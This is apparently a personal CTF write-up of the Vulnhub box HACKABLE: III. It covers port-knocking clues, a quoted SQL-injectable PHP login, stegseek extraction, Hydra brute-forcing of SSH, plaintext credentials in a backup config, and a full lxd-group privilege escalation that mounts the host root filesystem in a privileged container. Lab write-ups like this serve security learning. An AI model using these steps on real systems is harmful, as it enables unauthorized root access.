There has been nothing good on THM for a little while now, so I’m working back through some older Vulnhub machines. Not that this is particularly old, but whatever. I had looz in my list so I thought I might do that; once I booted it up I remembered that I already had finished the box but hadn’t bothered writing it up. Ooof. Oh and I’ve also done doubletrouble but haven’t written it up.

Anyway this was HACKABLE: III.

Let’s Go

HTTP only. Let’s start pokin’ around. A comment in the page source on the webroot says:

Please, jubiscleudo, don’t forget to activate the port knocking when exiting your section, and tell the boss not to forget to approve the .jpg file -

So…sounds like port knocking. Robots.txt disallows /config, which contains 1.txt, which contains: MTAwMDA=, which is 10000 in base64. That’s our first port.

We find port 2 here: This contains some brainfuck, which decodes to 4444; that’s our second port.

Viewing the source for gives us:


$usuario = $_POST['user'];
$senha = $_POST['pass'];

$query = " SELECT * FROM usuarios WHERE user = '{$usuario}' and pass = '{$senha}'";  
$result = mysqli_query($conexao, $query);
$row = mysqli_num_rows($result);

#validação conta
if($row == 1) {
	$_SESSION['usuario'] = $usuario;
	header('Location: 3.jpg');
} else {
	$_SESSION['nao_autenticado'] = true;
	header('Location: login_page/login.html');

So, if we go get 3.jpg we can run stegseek on it…

└─# stegseek 3.jpg            
StegSeek version 0.5
Progress: 0.00% (0 bytes)           

[i] --> Found passphrase: ""
[i] Original filename: "steganopayload148505.txt"
[i] Extracting to "3.jpg.out"
└─# cat 3.jpg.out 

And there’s our third port. Note you don’t have to use three ports for port knocking, but it’s common in CTFs.

Let’s see if it works:

knock 10000 4444 65535

Re-run the port scan, and bingo we have SSH open.


We already had two potential usernames:

  1. jubiscleudo, and
  2. dev_suport

And in the course of our fuzzing the webserver, we turned up which has 300 entries. I run it first with dev_suport with Hydra; no dice. But it’s bingo with jubiscleudo.

Once we get on, we have one other main user: hackable_3. We can find his password in /var/www/html/.backup_config.php

/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'hackable_3');
define('DB_PASSWORD', 'TrOLLED_3');
define('DB_NAME', 'hackable');
/* Attempt to connect to MySQL database */
$conexao = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);

// Check connection
if($conexao === false){
    die("ERROR: Could not connect. " . mysqli_connect_error());
} else {

There is no mysql on the box, but TrOLLED_3 works for hackable_3. hackable_3 is in the lxd group, so that’s it:

hackable_3@ubuntu20:~$ wget
--2021-09-17 12:12:38--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 3253157 (3.1M) [application/x-tar]
Saving to: ‘alpine-v3.14-x86_64-20210910_2324.tar.gz’

alpine-v3.14-x86_64-20210910_2324.tar.gz            100%[================================================================================================================>]   3.10M  --.-KB/s    in 0.02s   

2021-09-17 12:12:38 (172 MB/s) - ‘alpine-v3.14-x86_64-20210910_2324.tar.gz’ saved [3253157/3253157]

hackable_3@ubuntu20:~$ lxc image list
If this is your first time running LXD on this machine, you should also run: lxd init
To start your first instance, try: lxc launch ubuntu:18.04

hackable_3@ubuntu20:~$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]: 
Do you want to configure a new storage pool? (yes/no) [default=yes]: 
Name of the new storage pool [default=default]: 
Name of the storage backend to use (lvm, zfs, ceph, btrfs, dir) [default=zfs]: 
Create a new ZFS pool? (yes/no) [default=yes]: 
Would you like to use an existing empty block device (e.g. a disk or partition)? (yes/no) [default=no]: 
Size in GB of the new loop device (1GB minimum) [default=5GB]: 
Would you like to connect to a MAAS server? (yes/no) [default=no]: 
Would you like to create a new local network bridge? (yes/no) [default=yes]: 
What should the new bridge be called? [default=lxdbr0]: 
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
Would you like the LXD server to be available over the network? (yes/no) [default=no]: 
Would you like stale cached images to be updated automatically? (yes/no) [default=yes] 
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: 
hackable_3@ubuntu20:~$ lxc image import alpine-v3.14-x86_64-20210910_2324.tar.gz --alias alpine
Image imported with fingerprint: 1b9b6768ec27c8c3e20e09ccd8c1f3bc6a4a9e55b0a858926545c4ad3c88562b
hackable_3@ubuntu20:~$ lxc image list
| ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          | ARCHITECTURE |   TYPE    |  SIZE  |          UPLOAD DATE          |
| alpine | 1b9b6768ec27 | no     | alpine v3.14 (20210910_23:24) | x86_64       | CONTAINER | 3.10MB | Sep 17, 2021 at 12:13pm (UTC) |
hackable_3@ubuntu20:~$ lxc init alpine privesc -c security.privileged=true
Creating privesc
hackable_3@ubuntu20:~$ lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
Device host-root added to privesc
hackable_3@ubuntu20:~$ lxc start privesc
hackable_3@ubuntu20:~$ lxc exec privesc /bin/sh
~ # cd /mnt/root/root
/mnt/root/root # ls -lash
total 48K    
     4 drwx------    6 root     root        4.0K Jun 29 19:44 .
     4 drwxr-xr-x   21 root     root        4.0K Apr 29 16:32 ..
     0 -rw-------    1 root     root           0 Jun 30 20:46 .bash_history
     4 -rw-r--r--    1 root     root        3.0K Aug 14  2019 .bashrc
     4 drwx------    2 root     root        4.0K Apr 29 16:11 .cache
     4 -rw-------    1 root     root          28 Jun 29 19:44 .lesshst
     4 drwxr-xr-x    3 root     root        4.0K Apr 29 16:28 .local
     4 -rw-r--r--    1 root     root         161 Sep 16  2020 .profile
     4 -rw-r--r--    1 root     root          66 Apr 29 16:37 .selected_editor
     4 drwx------    2 root     root        4.0K Apr 27 15:07 .ssh
     4 -rwxr-xr-x    1 root     root          46 Jun 28 23:21
     4 -rw-------    1 root     root        2.7K Jun 28 23:41 root.txt
     4 drwxr-xr-x    3 root     root        4.0K Apr 27 15:07 snap
/mnt/root/root # cat root.txt

/mnt/root/root #